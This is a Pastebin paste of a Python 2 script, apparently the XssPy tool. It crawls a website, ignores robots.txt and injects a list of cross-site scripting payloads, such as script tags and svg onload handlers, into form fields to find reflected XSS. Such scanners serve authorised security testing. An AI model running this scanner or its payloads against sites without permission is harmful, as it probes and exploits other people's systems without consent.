API tools faq
paste
Advertisement
Guest User

Test

a guest
May 20th, 2019
61
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.41 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. import mechanize
  3. import sys
  4. import httplib
  5. import argparse
  6. import logging
  7. from urlparse import urlparse
  8.  
  9. br = mechanize.Browser()  
  10. br.addheaders = [
  11.     ('User-agent',
  12.      'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11')
  13. ]
  14. br.set_handle_robots(False)
  15. br.set_handle_refresh(False)
  16.  
  17. payloads = ['<h1>Hi</h1>','<img src="http://inexist.ent" onerror="javascript:alert(1)"/>','<svg onload="alert(/x/)">','<script>alert("Hello")</script>', '<svg "ons>', '" onfocus="alert(1);', 'javascript:alert(1)']
  18. blacklist = ['.png', '.jpg', '.jpeg', '.mp3', '.mp4', '.avi', '.gif', '.svg',
  19.              '.pdf']
  20. xssLinks = []          
  21.  
  22.  
  23. class color:
  24.     BLUE = '\033[94m'
  25.     RED = '\033[91m'
  26.     GREEN = '\033[92m'
  27.     YELLOW = '\033[93m'
  28.     BOLD = '\033[1m'
  29.     END = '\033[0m'
  30.  
  31.     @staticmethod
  32.     def log(lvl, col, msg):
  33.         logger.log(lvl, col + msg + color.END)
  34.  
  35.  
  36. print color.BOLD + color.RED + """
  37. Comprehensive Scan: python XssPy.py -u website.com -e
  38. Verbose logging: python XssPy.py -u website.com -v
  39. Cookies: python XssPy.py -u website.complex -c name=val name=val
  40. """ + color.END
  41.  
  42. logger = logging.getLogger(__name__)
  43. lh = logging.StreamHandler()
  44. logger.addHandler(lh)
  45. formatter = logging.Formatter('[%(asctime)s] %(message)s', datefmt='%H:%M:%S')
  46. lh.setFormatter(formatter)
  47.  
  48. parser = argparse.ArgumentParser()
  49. parser.add_argument('-u', action='store', dest='url',
  50.                     help='The URL to analyze')
  51. parser.add_argument('-e', action='store_true', dest='compOn',
  52.                     help='Enable comprehensive scan')
  53. parser.add_argument('-v', action='store_true', dest='verbose',
  54.                     help='Enable verbose logging')
  55. parser.add_argument('-c', action='store', dest='cookies',
  56.                     help='Space separated list of cookies',
  57.                     nargs='+', default=[])
  58. results = parser.parse_args()
  59.  
  60. logger.setLevel(logging.DEBUG if results.verbose else logging.INFO)
  61.  
  62.  
  63. def testPayload(payload, p, link):
  64.     br.form[str(p.name)] = payload
  65.     br.submit()
  66.     # if payload is found in response, we have XSS
  67.     if payload in br.response().read():
  68.         color.log(logging.DEBUG, color.BOLD + color.GREEN, 'XSS found!')
  69.         report = 'Link: %s, Payload: %s, Element: %s' % (str(link),
  70.                                                          payload, str(p.name))
  71.         color.log(logging.INFO, color.BOLD + color.GREEN, report)
  72.         xssLinks.append(report)
  73.     br.back()
  74.  
  75.  
  76. def initializeAndFind():
  77.  
  78.     if not results.url:  
  79.         color.log(logging.INFO, color.GREEN, 'Url not provided correctly')
  80.         return []
  81.  
  82.     firstDomains = []    
  83.     allURLS = []
  84.     allURLS.append(results.url)    
  85.     largeNumberOfUrls = []    
  86.    
  87.     for url in allURLS:
  88.         smallurl = str(url)
  89.  
  90.         try:
  91.             test = httplib.HTTPSConnection(smallurl)
  92.             test.request("GET", "/")
  93.             response = test.getresponse()
  94.             if (response.status == 200) | (response.status == 302):
  95.                 url = "https://www." + str(url)
  96.             elif response.status == 301:
  97.                 loc = response.getheader('Location')
  98.                 url = loc.scheme + '://' + loc.netloc
  99.             else:
  100.                 url = "http://www." + str(url)
  101.         except:
  102.             url = "http://www." + str(url)
  103.         try:
  104.             br.open(url)
  105.             for cookie in results.cookies:
  106.                 color.log(logging.INFO, color.BLUE,
  107.                           'Adding cookie: %s' % cookie)
  108.                 br.set_cookie(cookie)
  109.             br.open(url)
  110.             color.log(logging.INFO, color.GREEN,
  111.                       'Finding all the links of the website ' + str(url))
  112.             for link in br.links():        # finding all the links
  113.                 if smallurl in str(link.absolute_url):
  114.                     firstDomains.append(str(link.absolute_url))
  115.             firstDomains = list(set(firstDomains))
  116.         except:
  117.             pass
  118.         color.log(logging.INFO, color.GREEN,
  119.                   'Number of links to test are: ' + str(len(firstDomains)))
  120.         if results.compOn:
  121.             for link in firstDomains:
  122.                 try:
  123.                     br.open(link)
  124.              
  125.                     for newlink in br.links():
  126.                         if smallurl in str(newlink.absolute_url):
  127.                             largeNumberOfUrls.append(newlink.absolute_url)
  128.                 except:
  129.                     pass
  130.             firstDomains = list(set(firstDomains + largeNumberOfUrls))
  131.             color.log(logging.INFO, color.GREEN,
  132.                       'Total Number of links to test have become: ' +
  133.                       str(len(firstDomains)))  
  134.     return firstDomains
  135.  
  136.  
  137. def findxss(firstDomains):
  138.     color.log(logging.INFO, color.GREEN, 'Started finding XSS')
  139.     if firstDomains:  
  140.         for link in firstDomains:
  141.             blacklisted = False
  142.             y = str(link)
  143.             color.log(logging.DEBUG, color.YELLOW, str(link))
  144.             for ext in blacklist:
  145.                 if ext in y:
  146.                     color.log(logging.DEBUG, color.RED,
  147.                               '\tNot a good url to test')
  148.                     blacklisted = True
  149.                     break
  150.             if not blacklisted:
  151.                 try:
  152.                     br.open(str(link))    # open the link
  153.                     if br.forms():        # if a form exists, submit it
  154.                         params = list(br.forms())[0]    
  155.                         br.select_form(nr=0)
  156.                         for p in params.controls:
  157.                             par = str(p)
  158.                             if 'TextControl' in par:
  159.                                 color.log(logging.DEBUG, color.YELLOW,
  160.                                           '\tParam: ' + str(p.name))
  161.                                 for item in payloads:
  162.                                     testPayload(item, p, link)
  163.                 except:
  164.                     pass
  165.         color.log(logging.DEBUG, color.GREEN + color.BOLD,
  166.                   'The following links are vulnerable: ')
  167.         for link in xssLinks:        # print all xss
  168.             color.log(logging.DEBUG, color.GREEN, '\t' + link)
  169.     else:
  170.         color.log(logging.INFO, color.RED + color.BOLD,
  171.                   '\tNo link found, exiting')
  172. firstDomains = initializeAndFind()
  173. findxss(firstDomains)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!